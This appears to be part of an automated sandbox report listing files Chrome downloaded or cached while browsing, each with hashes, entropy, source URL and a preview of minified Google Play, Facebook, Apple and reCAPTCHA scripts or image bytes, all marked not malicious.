                                                                                                                                                                                                                                  Entropy (8bit):5.188013331319006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnQZLRolEOAuGNG/QVIcaKhiEU8nwQRaNw6JpyxZRNlad0:kRZTFYLRWII/AIcasiW8kbRN20
                                                                                                                                                                                                                                  MD5:007C27EA14B3E7BC040232FEBB89B270
                                                                                                                                                                                                                                  SHA1:7302058ED1A47765718C329236C687F89241993C
                                                                                                                                                                                                                                  SHA-256:3FB5AE458B80C50A149DE45A0338B11870A7EC1CCF61E2C7A5C036C58DA752EE
                                                                                                                                                                                                                                  SHA-512:489B93C8AD048489EFB82D3BF74DF1749CA0B879DF44E081CF7C6B84C8A4C59462888B915F3E75456F1559A68891472228701437487B9A5BD4CD6B63E571754B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("ULFnWe");._.qr(_.tBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"ULFnWe"}N(){return!0}Xa(){return _.iIc}});_.$q.ULFnWe=_.MQa;.._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32132
                                                                                                                                                                                                                                  Entropy (8bit):7.992096939239501
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:Y7gwPOWsl2qLFs0fskF8jx6DDRaZOwuwHtp02FMPyUSUSv7U6NcAo9t:YpOWsS0EavwZHk26PPlI7LB0t
                                                                                                                                                                                                                                  MD5:151F38C4AB2D0B4D2974DDFFDCDCFE4D
                                                                                                                                                                                                                                  SHA1:CF3505BE735BCCBF393549909D16D7DCF136F91D
                                                                                                                                                                                                                                  SHA-256:522469DBA2E69F4E49E3A2CE317EAE101D1045AC391B73CED32A50B718F01D49
                                                                                                                                                                                                                                  SHA-512:ADA20B3637DFDFD96A944B0E83A8DF0677435345AB3BF70AEEBECE691475A616B981E83523D8C6C9A2A8FD501F911087ADED4E70AF2531C7CF12CC15CEF83BE1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF|}..WEBPVP8 p}...q...*..(.>m*.E."!...@..5.........~..w..G.[.{._...._f...K..?...3............~......#...U..._.../..P...o.U.......-.#...;........^...=@?.{um.|{.G........!.w.?......9._c..z...._.?.~.~U}.........M.........{..?.o.>...}..?...o..._].{./..........m..........D.z.}.}.........?..P.....m......._...|..:...G..._.....}s...7.....G.G..."L.u..>...I..M}?*f...ko...........\y.....T..X.....K.........6g.........M.p.D...ty65.............4!....S...'.....n.XWbQ..px.bxPb87.......}..17....2.y^...(z89vV..g.]...K.,...&...\.,..x.|k.:@..?....k.....#.....z.~.2p?..A...)N.Y.pQr)......?....Z..!.@.b{p..7..,w]...|6......A.T..fc.T....1...w......u^c.m.,....Y&.S...$..}..e.c.......C1...w..K..Eu...94..0d.J...'c.0.).%..2yr..y=.l...J].x......^AQ..;...^..#..6`\...XT..f@<{..S....8.b<...N....j...yw..d.......&...-....K{.h5...@.d.*qo..K.M.dYZlhy.Qh.\."OV...l..V~.....................$+g..H.....,...../zi:....N.Q`.c.d-..z.G...q.V.q...k.......X..J.?(V"...k..0~H.4..v`..*mx.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1386
                                                                                                                                                                                                                                  Entropy (8bit):4.8492224043496055
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Yorj8jYfQypuazl92Qypua5HR9Iszb9mPuazEBb9mPuaSlSfvBLRKkfkMqVlM:Y4XzZzlkZTyszbgzEBbg+SJRKtpM
                                                                                                                                                                                                                                  MD5:662EA2BBC39B50BCDCBE04DC2CD7A087
                                                                                                                                                                                                                                  SHA1:4705F797D3E54D7953493DEBA121A8B4C397060F
                                                                                                                                                                                                                                  SHA-256:BFA43BCF43FA6CED5E1AF0BA042098DA244E4441A9C1D53E4B7B0DBFE764B1C6
                                                                                                                                                                                                                                  SHA-512:7E9903DE3548135C5C17813B2438D337BB565CEA17E6C3A5A4D7FF4B3A197A67B9FA6A16296A13174C5FA0D2E77EFBEC019E816541E074ACDB764F88EC685028
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://xp.apple.com/config/1/report/xp_amp_web_exp
                                                                                                                                                                                                                                  Preview:{"blacklistedFields":[],"constraints":{"profiles":{"AMPWeb":{"precedenceOrderedRules":[{"filters":{"nonEmptyFields":["isSignedIn"]},"fieldConstraints":{"clientId":{"generateValue":true,"namespace":"AMPWeb_isSignedOut","expirationPeriod":86400000}}},{"filters":{"valueMatches":{"isSignedIn":[true]}},"fieldConstraints":{"clientId":{"fieldType":"id","generateValue":true,"namespace":"AMPWeb_isSignedIn","expirationPeriod":15552000000}}}]}}},"treatmentProfiles":{"AMPWeb":{"treatments":[{"filters":{"isSignedIn":{"nonEmpty":true}},"fieldActions":{"clientId":{"treatmentType":"idGenerator","storageKeyPrefix":"mtClientId","namespace":"AMPWeb_isSignedOut","lifespan":86400000}}},{"filters":{"isSignedIn":{"valueMatches":[true]}},"fieldActions":{"clientId":{"treatmentType":"idGenerator","storageKeyPrefix":"mtClientId","namespace":"AMPWeb_isSignedIn","lifespan":15552000000}}}]}},"compoundSeparator":"_","fieldsMap":{"cookies":["itcCt","itscc"],"custom":{"impressions":["id","adamId","link.type","station-
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1618), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1618
                                                                                                                                                                                                                                  Entropy (8bit):5.781837534694755
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:VKEcJHxKo7LmvtUjPKtXsNEHFmc8s1aiRLrwUnG:fSHgj5c+HFbHv5suG
                                                                                                                                                                                                                                  MD5:94943530E104EE3F88D6AD86638B28C3
                                                                                                                                                                                                                                  SHA1:B8B7F7556523E03B5519338B59AE8D998987D457
                                                                                                                                                                                                                                  SHA-256:2538181A77FD5AEA93113400E39EBA98728EAC1FC13057F0B40C9AAE69054EA1
                                                                                                                                                                                                                                  SHA-512:5031C94E34477D67FAC9002DE62BB81CB359B16B59FAD19EB63CB1221ADFC275AC956F25580BBCA5D5F829FCBAAA4161F59302C584635E8D30217D3492F5D4D1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.google.com/recaptcha/api.js?trustedtypes=true&render=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0
                                                                                                                                                                                                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8477)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):51589
                                                                                                                                                                                                                                  Entropy (8bit):5.384712804809677
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:OLYXGST0ki7JD5x0KDKDJcrjrMwmvsPD3RcG1K3pWT:OLYXGHkiDx0KDCJcrjrMwmvsPD3o4T
                                                                                                                                                                                                                                  MD5:3608E76FBDA351ADDB0E78EEAA73AFD1
                                                                                                                                                                                                                                  SHA1:31655B8076AFFD1A292A133392F353A3EDAC2BDB
                                                                                                                                                                                                                                  SHA-256:651A7CADCEAFB12DF8E6D5B923F1DF00D33B632B1E4BD9BD3F1C01A92450B4F7
                                                                                                                                                                                                                                  SHA-512:5E99BACE7EBDC97AC89C92DDBC8D608737F11646EABAAFBE70520B6F5A1EAE421508465F4F2A6C17840CF8A30B21778819E907BEB8717D7292A506F99384A7CF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("BDSignalBufferData",[],(function(a,b,c,d,e,f){"use strict";a={};b=a;f["default"]=b}),66);.__d("SignalValueContext",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(a){this.cn=a}var b=a.prototype;b.getSignalValueContextName=function(){return this.cn};return a}();f["default"]=a}),66);.__d("BDSignalCollectorBase",["BDSignalBufferData","SignalValueContext","regeneratorRuntime"],(function(a,b,c,d,e,f,g){"use strict";a=function(){function a(a){this.signalType=a}var d=a.prototype;d.executeSignalCollection=function(){throw new Error("Child class responsibility to implement executeSignalCollection")};d.executeAsyncSignalCollection=function(){var a;return b("regeneratorRuntime").async(function(c){while(1)switch(c.prev=c.next){case 0:c.next=2;return b("regeneratorRuntime").awrap(this.executeSignalCollection());case 2:a=c.sent;return c.abrupt("return",a);case 4:case"end":return c.stop()}},null,this)};a.getSanitizedURI=function(){var a=window.location.href,b=a.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.187754044897426
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnAxSoLEOAuGNG/QVIKy5hiJGvWv6nwQRaNw6JpyxZRNlad0:kRZTFOSpI/AI9ieWv7kbRN20
                                                                                                                                                                                                                                  MD5:5E025E86D85D2F5D1456BB61623943FC
                                                                                                                                                                                                                                  SHA1:A9815A50C93942837148FBBF4D99FDAB0B56DFC6
                                                                                                                                                                                                                                  SHA-256:11DF2F37C88005DA98E72FD61F6654CF84E01B08A82AFDD2935E23C192F3EBBD
                                                                                                                                                                                                                                  SHA-512:A24D6D468E9BC32034E13237A5B06DD641C829557CD38822A301AA83F5648F087C9C2CEA01223CE3A54FA02AAEABE3751693E7AA8280AB11922FEBC279A1EA01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,gychg,hKSk3e,hc6Ubd,iAQMie,kJXwXb,kWgXee,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=ElYdAc"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("ElYdAc");._.qr(_.ZBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"ElYdAc"}N(){return!0}Xa(){return _.sOc}});_.$q.ElYdAc=_.oRa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):347368
                                                                                                                                                                                                                                  Entropy (8bit):7.998736090192847
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:SNdiQK5xfaW1mP/mNV0DgczZ8r4u2bmnHqQ20J77azWd7TUh6acObhZU6tl/n:S7f2oWEP/M0EoZ8cZzaucT0g6Dn
                                                                                                                                                                                                                                  MD5:1D1C8A8F43ADFA61DDA6784CEE72B7B5
                                                                                                                                                                                                                                  SHA1:5D6F3A99858C71765225887C8C987B9E7C8CD7F3
                                                                                                                                                                                                                                  SHA-256:4C93F943ABAC6A70089E5BFC24AA2F1D6BA28D998EADE4378653ABCA14B21975
                                                                                                                                                                                                                                  SHA-512:F48E72ED2A9F2B6E8D11BDB58EED6B302832F1C4F645683D54777D822EDE3D0BB23A60044BD0E3853443E6461FBFA6264D6BFACFE4CC844E29E2F0986B1715F5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/ApR4SacgWT7KSe5v_eEOrBvuKwQmeGpkOjfcC1WNINE8bJI7iBgaW00eohkBmJ73QW8=w648-h364-rw
                                                                                                                                                                                                                                  Preview:RIFF.L..WEBPVP8X...........k..VP8L.L../..Z..@l.F..y7......3..BD.'....q......$.`l.....m....m..3...m....c{...e..........<..............ff.1.N....2U.)....t \HUkl......mf..I.f..;....=......?....q.a...>..\.].%.B.t~4...kiI.4.....m..Y.ZKI4..n.vw.h.%.B........n....)..E..d.@.^=.....=...=...?.UU.9..<.A...r.cl[..u......y.GK.t:'...X.H..o...y.j.J"i._>..Z.P4.M.0=.D)...o...E.G...D....z..Um.[;.!.0.|.c..L......K.E.s{.=.`B.".@....m...r..L.}...i...._.......Q.A.....l.].r'{.....U...1.j...t*ed?N.)..,..c1BFF7...3. ##.$2........[.?Mm..k.suw..v.....<...v.'N{uj..020.!..B.!_.....m.A?..3.....'.vz...~...Ux.<.x..R.V.......FI...h...BH...x....~._...^.?.8t;gW..)!.U..Z.z........{.i.V.j.U#.(.`k.VV..a...8.#..>O-.>fu....u...!.~.....]...Fo.5j.(.q..9.pS..6..ir..i,q....c..M.....y..4..%.K.s......zK...V.:u.t.2..!...S..PX.O...8.f..0q\.-8...h'...;0..7..G.G1...7B..wuP.V. s...5.)...8.N=.>^...X..8mc+......8t.... ..).U.+].U+.....k.....#..f..B.A....V..m.9.....G*.P>.K..=.3.D.S..u.....t"..\T.F..+.8..L
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):36901
                                                                                                                                                                                                                                  Entropy (8bit):7.965499363084098
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:r3TccP24cnKiDwOpmB5s84Ye6qfWmG6ldF5eDt9LUHwVFCKKlY:r3TCXKxBgYe6qfWmG6l1eDT8KK6
                                                                                                                                                                                                                                  MD5:4D5AC3416F4786384C02A37E65A7CEB7
                                                                                                                                                                                                                                  SHA1:D9D8D26711B56222E5A59AD593B7609C23B50EF8
                                                                                                                                                                                                                                  SHA-256:BE97356CD7C083757498B687F9C02B00E35E44C2863B25F41DC93DC00F425748
                                                                                                                                                                                                                                  SHA-512:435BCFCB73BBB5FA5516B5EB6825B24C226DCDB67EFCD29FCCADD4B7B36D502057B0F85909EAED71AB9CE0838C373B2921668A046ECB190999897C6B253B142F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:......JFIF......................................................................................................................................................h....".........................................T........................!..1A."Qaq..2.....#BR..Sbr..3Cs..........$c.T...4U...%5d..................................:........................!1.AQ.aq.."R.......2B.#.3..brC..............?...(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(....(..".(....(B(..c^....m.M..~..2...\...EM.*..~..........o....wE....&..m\.s(..C...q....Qa&R..V.6%..l.>.......jM.....\A.4.p...../h.!y..j*.w'.A#.. q?G....M4.Z.w..!~...f.......$.$.."..G..0....'..).}..>?..B...<F..W\.z5.L%vv9...K.H.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 192 x 192, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                                                  Entropy (8bit):7.554456957317547
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:EWP8JUaPVKWwCtcHB3sXXRBJ3v8qkZ/aWr/3KZerMLvSOxJ3Df8sfqV1:lkJVKWw03XXZ4Meo931fq
                                                                                                                                                                                                                                  MD5:6452ED75C53E1A8E90A664DF18959A90
                                                                                                                                                                                                                                  SHA1:AC01FC2F40F0E4808E22A9C569F3775F0F15A5E2
                                                                                                                                                                                                                                  SHA-256:C7BAC3E7016DFC7EB5787579BAC6B975B433FC1A9C279DAFC35649D4782F2061
                                                                                                                                                                                                                                  SHA-512:4B23F7FB31826943CBA6496BD74DC620C8EC3B8F0525497E825F1F1F87486335D4374F85417458C3C3E018C2215B9B419D7DE77CB67AAE9EA619038432E1EB10
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/eFZD1KABzRA.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.............e..5...YPLTEGpL.e..e..e..p..e..f..f..h..f..f..`..`.....g..f..f..g..g..f..f..f..g..f..h..e..f..d..g..e..e..c..f..f..e..f..g..g..e..f..f........i..h..e..f..f.....e........e..g..f..f..f..f..f..f..g........f..e..e.......F........................f....F.....d........'y.....p....E.....U..7..t.................6..t...........U.................................p......uy...LtRNS.0`..... ......p..._....@..@..oPP...O.^..__....0.o.o.oO..p.P.P_n. ..@0..P........DIDATx..YS.G..G.]..N...t.6&.$..8v|.>{.."....m.3...../...X...*./.....z..Z...^-."|GT(T.K..Z..n..z.3..BT..Z....\.)..Y.....)..\XZs%..e../...........:....Z.R...,X...B....VCL......".~)P...@..P..8......YG..<...=..BLs..CX........0..J...I....Z..,....0g...i...B..}6.Eh.$.g.D1.k......... ..WYD....O..b~.~......U..s4..?...d0........x.g7.zF...........9..G*.A...~...=#.w0.1Z......K..BV..>....x.p...<LS...ft..(|...2XDE.Q...yc..$Mu.@.L...R=.X,.H....!.X).j../.-q2.....09.........\...&.bYk........j.o......../.u}..(5!.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.241017436266376
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnNRoO/AuGNG/QVILZhi31VzwQRaNw6JpyxZRNlad0:kRZTFnvSI/AI/iFOkbRN20
                                                                                                                                                                                                                                  MD5:2719F6F050C41BDC33F07358FF0B0ABD
                                                                                                                                                                                                                                  SHA1:7036429481F99A75CE941A24B1A2EBC559367A2F
                                                                                                                                                                                                                                  SHA-256:26C548B98CD4ACF5AEDB2FCF3DDFA4E5BAE7CB5E9F88FDC942E000C65812E68B
                                                                                                                                                                                                                                  SHA-512:93365AFEA56AF86C297138C08F66A4C7CA8131DDB5503AA94D7174477FC414BBEF1E2801DE78DEAA6DCA878B1A79D98C073D4E33DA3D1E1DCF76F09A9C1CC44E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("dZ05Qb");._.qr(_.Wza,class extends _.rr{constructor(a){super(a.ta)}H(){return"dZ05Qb"}N(){return!0}Xa(){return _.xwc}});_.$q.dZ05Qb=_.bQa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4490)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17188
                                                                                                                                                                                                                                  Entropy (8bit):5.523601084159109
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:E2PzxIwk6jqPSZUXV4jqPSZq17i+PV0vvnXhFawn8zVt9Pub6KS8BEUK582htJvh:lbxIwk6jqPSZUXV4jqPSZq17i+PV0vv4
                                                                                                                                                                                                                                  MD5:4BF456ED44F476CA182A174331B0769E
                                                                                                                                                                                                                                  SHA1:1DD833E61B5D88FD4404F1F876C5042523AB2419
                                                                                                                                                                                                                                  SHA-256:17721B2B06911470866BF609A6BF205E806C5FB4CA4B6DA278984DB5B1F6F2C1
                                                                                                                                                                                                                                  SHA-512:C406C0F6EEB84AA6CB64A45E2DFECD585EFD0C8BE4651FD7D17AA37489C48A8AADDD22691606400AE2D07803851DD08518E8F25E2800CCB00B160AB0A7D23D65
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("csx",[],(function(a,b,c,d,e,f){function a(a){throw new Error("csx: Unexpected class selector transformation.")}f["default"]=a}),66);.__d("getOrCreateDOMID",["uniqueID"],(function(a,b,c,d,e,f,g){function a(a){a.id||(a.id=c("uniqueID")());return a.id}g["default"]=a}),98);.__d("FocusEvent",["Event","Run","ge","getOrCreateDOMID"],(function(a,b,c,d,e,f,g){"use strict";var h={},i=!1;function j(a,b){if(h[a]){b=h[a].indexOf(b);b>=0&&h[a].splice(b,1);h[a].length===0&&delete h[a]}}function k(a){var b=a.getTarget();if(h[b.id]&&h[b.id].length>0){var c=a.type==="focusin"||a.type==="focus";h[b.id].forEach(function(a){a(c)})}}function l(){if(i)return;c("Event").listen(document.documentElement,"focusout",k);c("Event").listen(document.documentElement,"focusin",k);i=!0}function a(a,b,e){e===void 0&&(e={cleanupOnLeave:!0});l();var f=c("getOrCreateDOMID")(a);h[f]||(h[f]=[]);h[f].push(b);var g=!1;function i(){g||(j(f,b),k&&(k.remove(),k=null),g=!0)}var k=((a=e)==null?void 0:a.cleanu
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4901)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28366
                                                                                                                                                                                                                                  Entropy (8bit):5.376121039685713
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3dK9QwifftFUJ+4sPSPgx3b52eBwGEja4CFTDvVUczyL2FjAl+oM+NjX+P:wQ2aSPgx3h81PKFjAS
                                                                                                                                                                                                                                  MD5:73B3BCEF1573E8E904764459C5C03E27
                                                                                                                                                                                                                                  SHA1:938C9627FEFDF5D625C0C6E449FD65FCCA64962E
                                                                                                                                                                                                                                  SHA-256:073A42ECC9A4844E45FE12A0CA272E0C72155D629B8E9D8667764CD63ADA89D9
                                                                                                                                                                                                                                  SHA-512:483935D5A6F39C445FC357C8B6F4C60A792967FF9D0BB72EEAF55869792481E97ABFD64FA401FD18FF589ADDA7CB1A4E4F2D3980C4C4ABABAB1C944F73DDE787
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AbstractFBEmoji.react",["cx","react"],(function(a,b,c,d,e,f,g,h){"use strict";var i,j=i||d("react");function a(a){var b=a.children,c=a.size,d=a.src;a=a.title;c={height:c,width:c,fontSize:c,backgroundImage:"url('"+d+"')"};return j.jsx("span",{className:"_5mfr",title:a,children:j.jsx("span",{style:c,className:"_6qdm",children:b})})}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("BadgeHelper",["cx","fbt","DOM","joinClasses"],(function(a,b,c,d,e,f,g,h){var i={xsmall:"_5dzz",small:"_5dz-",medium:"_5dz_",large:"_5d-0",xlarge:"_5d-1"},j={bot:"_64nf",verified:"_56_f",trending:"_1gop",topcommenter:"_59t2",page_gray_check:"_5n3t",page_gray_check_solid:"_6w81",work:"_5d62",game_blue:"_59c6",work_non_coworker:"_2ad7",work_official_badge:"_8b0y",work_official_badge_gray:"_8b-m",interest_community:"_3qcr",subscription:"_4fvy",inactive_user:"_7xv0",multi_company_group:"_9o_f"};c=h._("Official group");var k={bot:h._("Bot"),work_non_coworker:h._("Not part of y
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (3857)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1160544
                                                                                                                                                                                                                                  Entropy (8bit):5.44525335877561
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:7IcMsN8pGT4l9C8OGMVi7Bv01hCAURju5p9NI:pUlT3v01Qg96
                                                                                                                                                                                                                                  MD5:56D26A46D0406F26005B8F47282EE333
                                                                                                                                                                                                                                  SHA1:69438EBE096B22A729813A305B578D0A58507384
                                                                                                                                                                                                                                  SHA-256:B5D9652D1696ADD89336DCCC3A72768A9E09D64D1186A82F2F8C38AFE117E4EF
